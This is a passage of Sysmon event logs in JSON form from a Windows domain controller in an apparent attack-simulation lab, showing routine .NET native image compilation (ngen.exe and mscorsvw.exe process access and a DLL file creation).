{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8029,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.309\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04C9-5F25-0000-0010F5951000}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.309","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04C9-5F25-0000-0010F5951000}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8030,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.309\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04C9-5F25-0000-0010F5951000}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.309","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04C9-5F25-0000-0010F5951000}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8031,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.309\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C9-5F25-0000-0010F5951000}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.309","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C9-5F25-0000-0010F5951000}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8032,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.356\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-001008A71200}\r\nTargetProcessId: 2680\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.356","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-001008A71200}","TargetProcessId":"2680","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8033,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.356\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-001008A71200}\r\nTargetProcessId: 2680\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.356","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-001008A71200}","TargetProcessId":"2680","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8034,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-001008A71200}\r\nTargetProcessId: 2680\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-001008A71200}","TargetProcessId":"2680","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8035,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:30.794\r\nProcessGuid: {A837DB8D-04FE-5F25-0000-001008A71200}\r\nProcessId: 2680\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a78-0\\XamlBuildTask.dll\r\nCreationUtcTime: 2020-08-01 06:00:30.794","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:30.794","ProcessGuid":"{A837DB8D-04FE-5F25-0000-001008A71200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a78-0\\XamlBuildTask.dll","CreationUtcTime":"2020-08-01 06:00:30.794","EventReceivedTime":"2020-08-01 06:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8036,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.825\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-00102AAC1200}\r\nTargetProcessId: 4648\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.825","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-00102AAC1200}","TargetProcessId":"4648","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8037,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.825\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-00102AAC1200}\r\nTargetProcessId: 4648\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 